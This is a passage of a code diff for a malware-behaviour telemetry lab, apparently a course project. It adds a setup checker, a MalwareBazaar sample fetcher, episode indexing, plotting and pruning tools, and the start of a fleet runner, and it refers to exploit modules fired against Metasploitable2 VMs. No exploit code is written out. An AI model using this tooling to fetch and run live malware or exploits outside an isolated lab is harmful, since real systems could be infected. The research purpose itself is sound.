+            from exploits.modules import load_module_configs as _load
+            catalog = _load(modules_dir)
+            same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
+            report.add(Check(
+                "tier3: module catalog parses",
+                "ok",
+                detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
+                       f"({len(catalog) - len(same_socket)} need BRIDGE)",
+            ))
+        except Exception as e:
+            report.add(Check(
+                "tier3: module catalog parses",
+                "fail",
+                detail=str(e),
+                fix="check exploits/modules/*.toml syntax",
+            ))
+    images = Path("/var/lib/cis490/vm/images")
+    msf2 = images / "metasploitable2.qcow2"
+    if _path_exists(msf2):
+        report.add(Check(f"tier3: {msf2}", "ok",
+                         detail=_size_str(msf2)))
+    else:
+        report.add(Check(
+            f"tier3: {msf2}",
+            "warn",
+            detail="optional — needed for Tier-3 episodes",
+            fix="IMAGE_URL=… IMAGE_SHA256=… sudo /opt/cis490/scripts/fetch-metasploitable2.sh",
+        ))
+
+
+def check_bridge(report: Report) -> None:
+    """Bridge readiness — pcap (source 4) + reverse/bind callback
+    payloads both need this. Without it, Tier-3 episodes that pick
+    callback modules will fire but the session never lands."""
+    rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
+    if rc == 0 and "br-malware" in out:
+        if "UP" in out or "UNKNOWN" in out:
+            report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
+        else:
+            report.add(Check(
+                "bridge: br-malware up",
+                "warn",
+                detail=out.strip()[:80],
+                fix="sudo ip link set br-malware up",
+            ))
+    else:
+        report.add(Check(
+            "bridge: br-malware exists",
+            "warn",
+            detail="optional — pcap capture + callback-payload Tier-3 "
+                   "modules require it",
+            fix="sudo /opt/cis490/vm/setup_bridge.sh",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — end to end (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_end_to_end(report: Report) -> None:
+    cfg = "/etc/cis490/lab-host.toml"
+    if not _path_exists(Path(cfg)):
+        report.add(Check("e2e: cis490-shipper --ping", "skip",
+                         detail="no lab-host.toml"))
+        return
+    rc, out, err = _run([
+        "/opt/cis490/.venv/bin/python", "-m", "shipper",
+        "--config", cfg, "--ping",
+    ], timeout=15.0)
+    if rc == 0 and '"ok": true' in out:
+        report.add(Check("e2e: cis490-shipper --ping", "ok",
+                         detail="200 OK"))
+    else:
+        report.add(Check(
+            "e2e: cis490-shipper --ping",
+            "fail",
+            detail=(out or err)[:200],
+            fix="paste this row's detail into a Forgejo issue or to the operator",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# main
+# ---------------------------------------------------------------------------
+
+
+def main(argv: list[str] | None = None) -> int:
+    global _JSON_MODE
+    p = argparse.ArgumentParser(prog="cis490-doctor")
+    p.add_argument("--role", choices=("lab-host", "receiver"), default="lab-host")
+    p.add_argument("--json", action="store_true",
+                   help="machine-readable output (suppresses progressive printing)")
+    p.add_argument("--no-tier3", action="store_true",
+                   help="skip the optional Tier-3 prerequisite checks")
+    args = p.parse_args(argv)
+    _JSON_MODE = args.json
+
+    repo_root = Path(__file__).resolve().parent.parent
+    if not _JSON_MODE:
+        print(f"{_ANSI_BOLD}cis490-doctor{_ANSI_RESET} role={args.role} repo={repo_root}\n")
+
+    report = Report(role=args.role)
+    check_repo(report, repo_root)
+    check_install(report, args.role)
+    if args.role == "lab-host":
+        check_certs_lab_host(report)
+    check_services(report, args.role)
+    if args.role == "lab-host":
+        check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
+        check_vm_prereqs(report)
+        check_bridge(report)
+        if not args.no_tier3:
+            check_tier3(report)
+        check_end_to_end(report)
+
+    summary = report.summary()
+    if _JSON_MODE:
+        json.dump(report.to_dict(), sys.stdout, indent=2)
+        print()
+    else:
+        print()
+        print(f"{_ANSI_BOLD}summary:{_ANSI_RESET} "
+              f"{_ANSI_GREEN}{summary['ok']} ok{_ANSI_RESET}, "
+              f"{_ANSI_YELLOW}{summary['warn']} warn{_ANSI_RESET}, "
+              f"{_ANSI_RED}{summary['fail']} fail{_ANSI_RESET}, "
+              f"{_ANSI_DIM}{summary['skip']} skip{_ANSI_RESET}")
+        if summary["fail"]:
+            print(
+                f"\n{_ANSI_BOLD}{_ANSI_RED}NOT READY.{_ANSI_RESET} "
+                "Run the `fix:` commands above in order, then re-run "
+                "`cis490-doctor`. When all rows are green/yellow, "
+                "episodes will start shipping to the Pi."
+            )
+        else:
+            print(
+                f"\n{_ANSI_BOLD}{_ANSI_GREEN}READY.{_ANSI_RESET} "
+                "Episodes should be flowing. Watch:\n"
+                "  sudo journalctl -u cis490-shipper -f\n"
+                "  ssh <pi> 'sudo tail -f /var/lib/cis490/index.jsonl'"
+            )
+
+    return 1 if summary["fail"] else 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/fetch_sample.py
+++ b/tools/fetch_sample.py
@ -0,0 +1,142 @@
+"""Fetch a malware sample by sha256 from MalwareBazaar.
+
+Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
+the hash on the way in, and prints the resulting path on stdout.
+
+Usage:
+
+    MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>
+
+MalwareBazaar requires a free API key as of late 2023; sign up at
+https://bazaar.abuse.ch and either pass via env or place in
+``samples/.bazaar.token`` (mode 0600, gitignored). The downloaded
+zip is unencrypted by ``infected`` per the MB convention.
+
+The fetcher is intentionally read-only over the network — no upload,
+no metadata posted — so a lab host with a tightly-egress-firewalled
+WG mesh can run it once on a build host and rsync the resulting
+``samples/store/`` directory across the fleet.
+"""
+
+from __future__ import annotations
+
+import argparse
+import hashlib
+import os
+import sys
+import urllib.parse
+import urllib.request
+import zipfile
+from pathlib import Path
+
+
+MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
+MB_ZIP_PASSWORD = b"infected"
+
+
+def _read_api_key(repo_root: Path) -> str | None:
+    env = os.environ.get("MALWAREBAZAAR_API_KEY")
+    if env:
+        return env.strip()
+    token = repo_root / "samples" / ".bazaar.token"
+    if token.exists():
+        return token.read_text().strip()
+    return None
+
+
+def fetch_sample(
+    sha256: str,
+    out_dir: Path,
+    api_key: str,
+    *,
+    timeout_s: float = 60.0,
+) -> Path:
+    if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
+        raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
+    sha256 = sha256.lower()
+    out_dir.mkdir(parents=True, exist_ok=True)
+
+    target = out_dir / sha256
+    if target.exists():
+        actual = hashlib.sha256(target.read_bytes()).hexdigest()
+        if actual == sha256:
+            return target
+        target.unlink()  # tampered or partial; refetch.
+
+    body = urllib.parse.urlencode({
+        "query": "get_file",
+        "sha256_hash": sha256,
+    }).encode("utf-8")
+    req = urllib.request.Request(
+        MB_ENDPOINT,
+        data=body,
+        headers={
+            "Auth-Key": api_key,
+            "User-Agent": "cis490-fetcher/0",
+        },
+        method="POST",
+    )
+    with urllib.request.urlopen(req, timeout=timeout_s) as r:
+        payload = r.read()
+
+    if not payload.startswith(b"PK"):
+        raise RuntimeError(
+            f"MalwareBazaar returned non-zip response (first 200 bytes): "
+            f"{payload[:200]!r}"
+        )
+
+    zip_path = out_dir / f"{sha256}.zip"
+    zip_path.write_bytes(payload)
+    try:
+        with zipfile.ZipFile(zip_path) as zf:
+            zf.setpassword(MB_ZIP_PASSWORD)
+            names = zf.namelist()
+            if not names:
+                raise RuntimeError(f"{sha256}: empty zip")
+            with zf.open(names[0]) as src, target.open("wb") as dst:
+                dst.write(src.read())
+    finally:
+        zip_path.unlink(missing_ok=True)
+
+    actual = hashlib.sha256(target.read_bytes()).hexdigest()
+    if actual != sha256:
+        target.unlink()
+        raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
+    return target
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="fetch_sample")
+    p.add_argument("sha256")
+    p.add_argument(
+        "--out-dir",
+        type=Path,
+        default=None,
+        help="Where to drop <sha256> (default: samples/store/ relative to repo)",
+    )
+    args = p.parse_args(argv)
+
+    repo_root = Path(__file__).resolve().parent.parent
+    out_dir = args.out_dir or (repo_root / "samples" / "store")
+
+    api_key = _read_api_key(repo_root)
+    if not api_key:
+        print(
+            "no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
+            "samples/.bazaar.token (mode 0600). Register at "
+            "https://bazaar.abuse.ch.",
+            file=sys.stderr,
+        )
+        return 2
+
+    try:
+        path = fetch_sample(args.sha256, out_dir, api_key)
+    except Exception as e:
+        print(f"fetch failed: {e}", file=sys.stderr)
+        return 1
+    print(path)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/index_reader.py
+++ b/tools/index_reader.py
@ -0,0 +1,136 @@
+"""Read + filter the receiver's ``index.jsonl``.
+
+Usage:
+
+    # All episodes from one host:
+    cis490-index --host lab-host-1
+
+    # All episodes for a particular sample:
+    cis490-index --sample xmrig-cryptominer
+
+    # Today's episodes, sorted by size:
+    cis490-index --since 2026-04-30 --sort size
+
+    # Group/count by host:
+    cis490-index --count-by host_id
+
+The index file is the closest thing to a database the receiver has
+until we move to Postgres/Timescale. This tool is the temporary CLI
+view over it; it's intentionally read-only and never opens episode
+tarballs (just the index rows).
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from collections import Counter
+from datetime import datetime, timezone
+from pathlib import Path
+
+
+DEFAULT_INDEX = "/var/lib/cis490/index.jsonl"
+
+
+def _parse_since(s: str) -> datetime:
+    # Accept ISO-8601 with or without time.
+    for fmt in ("%Y-%m-%dT%H:%M:%S%z", "%Y-%m-%d", "%Y-%m-%dT%H:%M:%S"):
+        try:
+            dt = datetime.strptime(s, fmt)
+            if dt.tzinfo is None:
+                dt = dt.replace(tzinfo=timezone.utc)
+            return dt
+        except ValueError:
+            continue
+    # Last resort: fromisoformat which handles a wider range in 3.11+.
+    dt = datetime.fromisoformat(s)
+    if dt.tzinfo is None:
+        dt = dt.replace(tzinfo=timezone.utc)
+    return dt
+
+
+def _row_time(row: dict) -> datetime | None:
+    s = row.get("received_at_wall")
+    if not s:
+        return None
+    try:
+        return datetime.fromisoformat(s.replace("Z", "+00:00"))
+    except ValueError:
+        return None
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-index")
+    p.add_argument("--index", default=DEFAULT_INDEX,
+                   help=f"path to index.jsonl (default {DEFAULT_INDEX})")
+    p.add_argument("--host", help="only rows from this host_id")
+    p.add_argument("--sample",
+                   help="only rows whose meta.sample.name matches "
+                        "(requires meta.json from a recent commit)")
+    p.add_argument("--since", help="ISO date or datetime; only rows received on/after")
+    p.add_argument("--until", help="ISO date or datetime; only rows received before")
+    p.add_argument("--sort", choices=("time", "size", "host"), default="time")
+    p.add_argument("--count-by",
+                   choices=("host_id", "schema_version"),
+                   help="instead of printing rows, group + count by this field")
+    p.add_argument("--limit", type=int, default=0,
+                   help="cap output rows (0 = all)")
+    args = p.parse_args(argv)
+
+    path = Path(args.index)
+    if not path.exists():
+        print(f"no index at {path}", file=sys.stderr)
+        return 2
+
+    since = _parse_since(args.since) if args.since else None
+    until = _parse_since(args.until) if args.until else None
+
+    rows: list[dict] = []
+    with path.open() as f:
+        for line in f:
+            line = line.strip()
+            if not line:
+                continue
+            try:
+                row = json.loads(line)
+            except json.JSONDecodeError:
+                continue
+            if args.host and row.get("host_id") != args.host:
+                continue
+            if since or until:
+                t = _row_time(row)
+                if t is None:
+                    continue
+                if since and t < since:
+                    continue
+                if until and t >= until:
+                    continue
+            rows.append(row)
+
+    if args.count_by:
+        counts = Counter(r.get(args.count_by, "<missing>") for r in rows)
+        for k, n in counts.most_common():
+            print(f"{n:>6}  {k}")
+        return 0
+
+    sort_keys = {
+        "time": lambda r: r.get("received_at_wall", ""),
+        "size": lambda r: r.get("size_bytes", 0),
+        "host": lambda r: r.get("host_id", ""),
+    }
+    rows.sort(key=sort_keys[args.sort])
+    if args.limit:
+        rows = rows[-args.limit:] if args.sort != "size" else rows[:args.limit]
+
+    # Print TSV-ish for quick eyeballing + downstream pipe-friendliness.
+    print("received_at_wall\thost_id\tepisode_id\tsize_bytes\tschema_version\tsha256")
+    for r in rows:
+        print("\t".join(str(r.get(k, "")) for k in
+                        ("received_at_wall", "host_id", "episode_id",
+                         "size_bytes", "schema_version", "sha256")))
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/plot_envelope.py
+++ b/tools/plot_envelope.py
@ -1,8 +1,19 @@
 """Plot a single episode's envelope.

-Reads ``telemetry-proc.jsonl`` and ``labels.jsonl`` from an episode directory
-and renders a 3-panel chart: CPU%, RSS, IO write rate, with phase bands
-underneath.
+Renders a multi-panel chart from whatever telemetry the episode dir
+contains, with phase bands underneath each panel:
+
+  panel 1 — host /proc CPU%      (source 1, always)
+  panel 2 — host /proc RSS       (source 1, always)
+  panel 3 — host /proc IO write  (source 1, always)
+  panel 4 — QMP block I/O ops    (source 2, if telemetry-qmp.jsonl)
+  panel 5 — perf IPC + miss-rate (source 3, if telemetry-perf.jsonl)
+  panel 6 — bridge pcap pkts/s   (source 4, if netflow.jsonl)
+  panel 7 — guest agent CPU/load (source 5, if telemetry-guest.jsonl)
+
+Missing sources are silently skipped — a Tier-1 episode dir with only
+proc telemetry still gets the original 3-panel plot. A Tier-3+ run
+with all five sources gets the full stack on a shared time axis.

 Two modes:

@ -103,21 +114,77 @@ def main() -> int:
        end = labels[i + 1]["t_mono_ns"] / 1e9 if i + 1 < len(labels) else end_t
        spans.append((start, end, lbl["phase"]))

-    fig, axes = plt.subplots(3, 1, figsize=(13, 8), sharex=True)
+    # Discover optional sources.
+    qmp_rows = _load_jsonl(d / "telemetry-qmp.jsonl") if (d / "telemetry-qmp.jsonl").exists() else []
+    perf_rows = _load_jsonl(d / "telemetry-perf.jsonl") if (d / "telemetry-perf.jsonl").exists() else []
+    netflow_rows = _load_jsonl(d / "netflow.jsonl") if (d / "netflow.jsonl").exists() else []
+    guest_rows = _load_jsonl(d / "telemetry-guest.jsonl") if (d / "telemetry-guest.jsonl").exists() else []

-    axes[0].plot(t, cpu_pct, color="#222222", linewidth=1.0)
-    axes[0].set_ylabel("CPU %")
-    axes[0].set_ylim(-3, 110)
-    axes[0].grid(alpha=0.25)
+    panels: list[tuple[str, callable]] = []  # (ylabel, plot_fn(ax))
+    panels.append(("CPU % (proc)", lambda ax: (
+        ax.plot(t, cpu_pct, color="#222222", linewidth=1.0),
+        ax.set_ylim(-3, 110),
+    )))
+    panels.append(("RSS (MiB)", lambda ax: ax.plot(t, rss_mib, color="#222222", linewidth=1.0)))
+    panels.append(("IO write (KiB/s)", lambda ax: ax.plot(t, io_kb_s, color="#222222", linewidth=1.0)))

-    axes[1].plot(t, rss_mib, color="#222222", linewidth=1.0)
-    axes[1].set_ylabel("RSS (MiB)")
-    axes[1].grid(alpha=0.25)
+    if qmp_rows:
+        qt = [r["t_mono_ns"] / 1e9 for r in qmp_rows]
+        # Sum block I/O ops across devices.
+        wr_ops = []
+        rd_ops = []
+        for r in qmp_rows:
+            bs = r.get("blockstats") or {}
+            wr_ops.append(sum(d.get("wr_ops", 0) for d in bs.values()))
+            rd_ops.append(sum(d.get("rd_ops", 0) for d in bs.values()))
+        panels.append(("QMP block ops (cum)", lambda ax: (
+            ax.plot(qt, wr_ops, color="#cc4444", linewidth=1.0, label="wr_ops"),
+            ax.plot(qt, rd_ops, color="#4488cc", linewidth=1.0, label="rd_ops"),
+            ax.legend(loc="upper left", fontsize=8),
+        )))

-    axes[2].plot(t, io_kb_s, color="#222222", linewidth=1.0)
-    axes[2].set_ylabel("IO write (KiB/s)")
-    axes[2].set_xlabel("time (s)")
-    axes[2].grid(alpha=0.25)
+    if perf_rows:
+        pt = [r["t_mono_ns"] / 1e9 for r in perf_rows]
+        ipc = [r.get("ipc") or 0 for r in perf_rows]
+        miss = [r.get("cache_miss_rate") or 0 for r in perf_rows]
+        panels.append(("perf IPC / miss-rate", lambda ax: (
+            ax.plot(pt, ipc, color="#222222", linewidth=1.0, label="IPC"),
+            ax.plot(pt, miss, color="#cc4444", linewidth=1.0, label="cache miss rate"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+
+    if netflow_rows:
+        nt = [r["t_mono_ns"] / 1e9 for r in netflow_rows]
+        pkts = [(r.get("pkts_in", 0) + r.get("pkts_out", 0)) for r in netflow_rows]
+        synf = [r.get("syn_count", 0) for r in netflow_rows]
+        panels.append(("bridge pkts / SYNs (per 100 ms)", lambda ax: (
+            ax.plot(nt, pkts, color="#222222", linewidth=1.0, label="pkts"),
+            ax.plot(nt, synf, color="#cc4444", linewidth=1.0, label="syn"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+
+    if guest_rows:
+        gt = [r["t_mono_ns"] / 1e9 for r in guest_rows]
+        load1 = [(r.get("load_1m_5m_15m") or [0])[0] for r in guest_rows]
+        mem_used = [
+            ((r.get("mem_total_bytes") or 0) - (r.get("mem_available_bytes") or 0)) / (1024 * 1024)
+            for r in guest_rows
+        ]
+        panels.append(("guest load1 / mem_used (MiB)", lambda ax: (
+            ax.plot(gt, load1, color="#222222", linewidth=1.0, label="load1"),
+            ax.twinx().plot(gt, mem_used, color="#4488cc", linewidth=1.0, label="mem MiB"),
+        )))
+
+    n = len(panels)
+    fig, axes = plt.subplots(n, 1, figsize=(13, 2 + 1.6 * n), sharex=True)
+    if n == 1:
+        axes = [axes]
+
+    for ax, (ylabel, plot_fn) in zip(axes, panels):
+        plot_fn(ax)
+        ax.set_ylabel(ylabel)
+        ax.grid(alpha=0.25)
+    axes[-1].set_xlabel("time (s)")

    for ax in axes:
        for start, end, phase in spans:
--- a/tools/prune_episodes.py
+++ b/tools/prune_episodes.py
@ -0,0 +1,364 @@
+"""``cis490-prune`` — retroactively filter low-quality episodes from
+the receiver's dataset.
+
+The signals that mark an episode as low-quality:
+
+  no-sample          meta.sample is null. Pre-Sample-propagation code
+                     (commit a193d17 or earlier) ran the v1 yes-loop
+                     fallback regardless of what the fleet picked, so
+                     post-infection variety isn't recorded in meta.
+
+  no-workload-events events.jsonl has zero workload_* rows. Pre-audit-
+                     trail code (commit d86502d or earlier) ran with
+                     no event emission from VMLoadController, so we
+                     can't tell whether the workload actually fired.
+
+  workload-failed    events.jsonl contains a workload_failed row. The
+                     SerialClient.run() raised mid-phase; the labels
+                     and telemetry don't match what the orchestrator
+                     was supposed to be doing.
+
+  workload-silent    workload_killed event during the dormant phase
+                     has pre_kill_probe.yes == "0", meaning no
+                     ``yes``-loop process was running when we tried
+                     to kill it. This is the elliott-lab fingerprint:
+                     the schedule walked but nothing fired in-guest.
+
+  flat-cpu           /proc CPU% delta between phases is under 5
+                     percentage points across all phase boundaries.
+                     A model trained on these episodes can't
+                     distinguish phases.
+
+Usage:
+    cis490-prune                     # dry-run summary, no changes
+    cis490-prune --reason no-sample  # filter to one signal
+    cis490-prune --archive           # mv flagged episodes to
+                                     #   /var/lib/cis490/episodes-archive/
+    cis490-prune --delete            # rm flagged episodes + index rows
+
+Run from the receiver's host where /var/lib/cis490/ lives. Operator
+runs as root because the episode store is owned by the cis490 user
+mode 0640.
+"""
+
+from __future__ import annotations
+
+import argparse
+import io
+import json
+import os
+import shutil
+import statistics
+import subprocess
+import sys
+import tarfile
+import tempfile
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Iterator
+
+
+_REASONS = (
+    "no-sample",
+    "no-workload-events",
+    "workload-failed",
+    "workload-silent",
+    "flat-cpu",
+)
+
+
+@dataclass
+class EpisodeQuality:
+    host_id: str
+    episode_id: str
+    tar_path: Path
+    size_bytes: int
+    reasons: list[str] = field(default_factory=list)
+    sample_name: str | None = None
+    module_name: str | None = None
+
+    @property
+    def fake(self) -> bool:
+        return bool(self.reasons)
+
+
+# ---------------------------------------------------------------------------
+# tarball introspection
+# ---------------------------------------------------------------------------
+
+
+def _read_jsonl_from_tar(tar: tarfile.TarFile, name_suffix: str) -> list[dict]:
+    """Extract a JSONL member by name suffix (e.g. 'events.jsonl')."""
+    for m in tar.getmembers():
+        if m.name.endswith(name_suffix) and m.isfile():
+            f = tar.extractfile(m)
+            if f is None:
+                return []
+            text = f.read().decode("utf-8", errors="replace")
+            return [json.loads(line) for line in text.splitlines() if line.strip()]
+    return []
+
+
+def _read_meta_from_tar(tar: tarfile.TarFile) -> dict:
+    for m in tar.getmembers():
+        if m.name.endswith("meta.json") and m.isfile():
+            f = tar.extractfile(m)
+            if f is None:
+                return {}
+            return json.loads(f.read().decode("utf-8"))
+    return {}
+
+
+def _decompress_zstd(zst_path: Path) -> bytes:
+    """Pure stdlib doesn't have zstd; shell out (already a project dep
+    — install scripts require it)."""
+    p = subprocess.run(
+        ["zstd", "-q", "-d", "--stdout", str(zst_path)],
+        check=True, capture_output=True,
+    )
+    return p.stdout
+
+
+def classify_episode(tar_zst: Path, host_id: str, episode_id: str) -> EpisodeQuality:
+    """Open the tarball, scan meta + events + telemetry, return a
+    quality verdict. Each signal is independent — an episode can hit
+    multiple reasons (e.g. no-sample + workload-silent)."""
+    q = EpisodeQuality(
+        host_id=host_id,
+        episode_id=episode_id,
+        tar_path=tar_zst,
+        size_bytes=tar_zst.stat().st_size,
+    )
+
+    try:
+        raw = _decompress_zstd(tar_zst)
+    except (subprocess.CalledProcessError, OSError) as e:
+        q.reasons.append(f"unreadable: {e}"[:80])
+        return q
+
+    with tarfile.open(fileobj=io.BytesIO(raw)) as tar:
+        meta = _read_meta_from_tar(tar)
+        events = _read_jsonl_from_tar(tar, "events.jsonl")
+        proc = _read_jsonl_from_tar(tar, "telemetry-proc.jsonl")
+        labels = _read_jsonl_from_tar(tar, "labels.jsonl")
+
+    sample = meta.get("sample")
+    if sample is None:
+        q.reasons.append("no-sample")
+    else:
+        q.sample_name = sample.get("name")
+
+    exploit = meta.get("exploit")
+    if exploit is not None:
+        q.module_name = exploit.get("module_name")
+
+    workload_events = [e for e in events if str(e.get("event", "")).startswith("workload_")]
+    if not workload_events:
+        q.reasons.append("no-workload-events")
+    if any(e.get("event") == "workload_failed" for e in events):
+        q.reasons.append("workload-failed")
+
+    # workload-silent: dormant transition's probe shows no `yes` proc.
+    for e in events:
+        if e.get("event") != "workload_killed":
+            continue
+        if e.get("phase") != "dormant":
+            continue
+        probe = e.get("pre_kill_probe")
+        if isinstance(probe, dict) and probe.get("yes") == "0":
+            q.reasons.append("workload-silent")
+            break
+
+    # flat-cpu: bucket /proc CPU% by phase, check inter-phase spread.
+    if proc and labels:
+        clk_tck = os.sysconf("SC_CLK_TCK")
+
+        def phase_at(t_ns: int) -> str:
+            cur = "(pre)"
+            for l in labels:
+                if l["t_mono_ns"] <= t_ns:
+                    cur = l["phase"]
+                else:
+                    break
+            return cur
+
+        per_phase: dict[str, list[float]] = {}
+        prev = None
+        for r in proc:
+            if prev is not None:
+                dt = (r["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
+                if dt > 0:
+                    djiff = (r["cpu_user_jiffies"] + r["cpu_sys_jiffies"]) - \
+                            (prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
+                    pct = 100.0 * (djiff / clk_tck) / dt
+                    per_phase.setdefault(phase_at(r["t_mono_ns"]), []).append(pct)
+            prev = r
+        if per_phase:
+            medians = [statistics.median(v) for v in per_phase.values() if v]
+            if medians and (max(medians) - min(medians)) < 5.0:
+                q.reasons.append("flat-cpu")
+
+    return q
+
+
+# ---------------------------------------------------------------------------
+# Index walking + actions
+# ---------------------------------------------------------------------------
+
+
+def walk_index(index_path: Path, episodes_root: Path) -> Iterator[tuple[dict, Path]]:
+    if not index_path.exists():
+        return
+    for line in index_path.read_text().splitlines():
+        if not line.strip():
+            continue
+        try:
+            row = json.loads(line)
+        except json.JSONDecodeError:
+            continue
+        host = row.get("host_id", "")
+        ep = row.get("episode_id", "")
+        if not host or not ep:
+            continue
+        tar = episodes_root / host / f"{ep}.tar.zst"
+        if not tar.exists():
+            continue
+        yield row, tar
+
+
+def apply_action(
+    quals: list[EpisodeQuality],
+    *,
+    action: str,
+    archive_root: Path,
+    index_path: Path,
+) -> None:
+    """Carry out --delete or --archive on flagged episodes + drop
+    matching rows from index.jsonl. Atomic-ish: index rewrite is
+    single-shot after all tarballs are handled."""
+    if action not in ("delete", "archive"):
+        return
+    flagged_ids = {q.episode_id for q in quals if q.fake}
+    if not flagged_ids:
+        return
+
+    if action == "archive":
+        archive_root.mkdir(parents=True, exist_ok=True)
+    for q in quals:
+        if not q.fake:
+            continue
+        if action == "archive":
+            target = archive_root / q.host_id
+            target.mkdir(parents=True, exist_ok=True)
+            shutil.move(str(q.tar_path), target / q.tar_path.name)
+        elif action == "delete":
+            q.tar_path.unlink(missing_ok=True)
+
+    if index_path.exists():
+        kept = []
+        for line in index_path.read_text().splitlines():
+            try:
+                row = json.loads(line)
+            except json.JSONDecodeError:
+                kept.append(line)
+                continue
+            if row.get("episode_id") in flagged_ids:
+                continue
+            kept.append(line)
+        # Rewrite via tempfile + replace so a crash mid-write doesn't
+        # corrupt the live index.
+        tmp = index_path.with_suffix(".jsonl.partial")
+        tmp.write_text("\n".join(kept) + ("\n" if kept else ""))
+        os.replace(tmp, index_path)
+
+
+# ---------------------------------------------------------------------------
+# CLI
+# ---------------------------------------------------------------------------
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-prune")
+    p.add_argument("--episodes-root", type=Path,
+                   default=Path("/var/lib/cis490/episodes"))
+    p.add_argument("--index", type=Path,
+                   default=Path("/var/lib/cis490/index.jsonl"))
+    p.add_argument("--archive-root", type=Path,
+                   default=Path("/var/lib/cis490/episodes-archive"))
+    p.add_argument("--reason", action="append", choices=_REASONS,
+                   help="Only flag episodes matching this reason. Repeat "
+                        "to OR multiple. Default: all reasons.")
+    p.add_argument("--host", help="Only consider episodes from this host_id")
+    action = p.add_mutually_exclusive_group()
+    action.add_argument("--delete", action="store_true",
+                        help="Remove flagged tarballs + drop their index rows")
+    action.add_argument("--archive", action="store_true",
+                        help="Move flagged tarballs to --archive-root + drop index rows")
+    p.add_argument("--json", action="store_true",
+                   help="Machine-readable output instead of summary")
+    args = p.parse_args(argv)
+
+    if not args.episodes_root.exists():
+        print(f"no episodes dir at {args.episodes_root}", file=sys.stderr)
+        return 2
+
+    selected_reasons = set(args.reason or _REASONS)
+
+    quals: list[EpisodeQuality] = []
+    for row, tar in walk_index(args.index, args.episodes_root):
+        if args.host and row["host_id"] != args.host:
+            continue
+        q = classify_episode(tar, row["host_id"], row["episode_id"])
+        # Only mark "fake" if at least one of the selected reasons hits.
+        q.reasons = [r for r in q.reasons if r in selected_reasons]
+        quals.append(q)
+
+    flagged = [q for q in quals if q.fake]
+    kept = [q for q in quals if not q.fake]
+
+    if args.json:
+        print(json.dumps({
+            "scanned": len(quals),
+            "flagged": len(flagged),
+            "kept": len(kept),
+            "by_reason": {
+                r: sum(1 for q in flagged if r in q.reasons) for r in _REASONS
+            },
+            "flagged_episodes": [
+                {
+                    "host": q.host_id,
+                    "episode": q.episode_id,
+                    "size_bytes": q.size_bytes,
+                    "reasons": q.reasons,
+                    "sample": q.sample_name,
+                    "module": q.module_name,
+                } for q in flagged
+            ],
+        }, indent=2))
+    else:
+        print(f"scanned: {len(quals)}  flagged: {len(flagged)}  kept: {len(kept)}")
+        if flagged:
+            print()
+            print(f"{'host':<14} {'episode':<28} {'size':>9} reasons")
+            for q in flagged:
+                print(f"{q.host_id:<14} {q.episode_id:<28} {q.size_bytes:>9}  "
+                      f"{','.join(q.reasons)}")
+        if not (args.delete or args.archive):
+            print()
+            print("dry-run only. Re-run with --archive (safer) or --delete.")
+
+    if args.delete or args.archive:
+        action = "delete" if args.delete else "archive"
+        apply_action(
+            quals,
+            action=action,
+            archive_root=args.archive_root,
+            index_path=args.index,
+        )
+        print(f"\n{action}d {sum(1 for q in flagged)} episodes")
+
+    return 0 if not flagged else 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/run_fleet.py
+++ b/tools/run_fleet.py
@ -0,0 +1,109 @@
+"""``cis490-fleet`` — run as many concurrent labeled episodes as the
+host can handle, drawing samples from the manifest.
+
+Modes:
+
+  --capacity     Print the resource calculation and exit. No VMs spawned.
+  --waves N      Run N waves of episodes (one wave = max_concurrent
+                 episodes, each in its own slot). Default: 1.
+  --max-concurrent N
+                 Cap concurrency below the auto-detected ceiling.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import logging
+import os
+import signal
+import sys
+from pathlib import Path
+
+# Allow running as a script.
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from exploits.modules import load_module_configs  # noqa: E402
+from orchestrator.fleet import (  # noqa: E402
+    FleetConfig, FleetRunner, capacity_report, detect_capacity,
+)
+from samples.manifest import SampleManifest  # noqa: E402
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-fleet")
+    p.add_argument("--capacity", action="store_true")
+    p.add_argument("--waves", type=int, default=1)
+    p.add_argument("--max-concurrent", type=int, default=None)
+    p.add_argument("--manifest",
+                   default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
+    p.add_argument("--modules-dir",
+                   default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
+    p.add_argument("--data-root", default="data")
+    p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
+    p.add_argument("--ram-per-vm-mib", type=int, default=320)
+    p.add_argument("--require-real-samples", action="store_true")
+    p.add_argument("--force-tier2", action="store_true",
+                   help="Skip Tier 3 even when msfrpcd is reachable")
+    p.add_argument("--log-level", default="INFO")
+    args = p.parse_args(argv)
+
